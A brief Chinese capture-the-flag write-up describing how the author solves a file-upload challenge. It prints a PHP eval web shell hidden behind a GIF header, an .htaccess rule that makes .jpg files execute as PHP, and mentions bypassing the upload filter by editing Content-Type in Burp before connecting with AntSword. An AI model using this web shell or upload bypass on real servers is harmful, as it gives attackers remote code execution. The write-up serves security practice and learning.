本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助

打开靶机,看到文件上传入口,推测该题为文件上传漏洞,
上传测试文件看看有什么上传文件限制,


提示不能带有ph的后缀名,
传入图片木马试试,

1
2
GIF89
<script language="php">@eval($_POST['cmd']); </script>


这次上传成功了,接下来需要做的是让上传的图片木马以php形式解析,
因为含ph的后缀名文件被过滤了,不能通过修改文件后缀名phtml来达到目的,
所以我们选择修改配置文件.htaccess将文件解析为php,
.htaccess内容:

1
2
3
<IfModule mime_module>
AddType application/x-httpd-php .jpg
</IfModule>

使存在该文件的目录下的.jpg文件以php文件来解析,


文件被过滤,Burp抓包试试修改Content-Type字段,

成功上传,
使用蚁剑连接,

查找根目录,


获得flag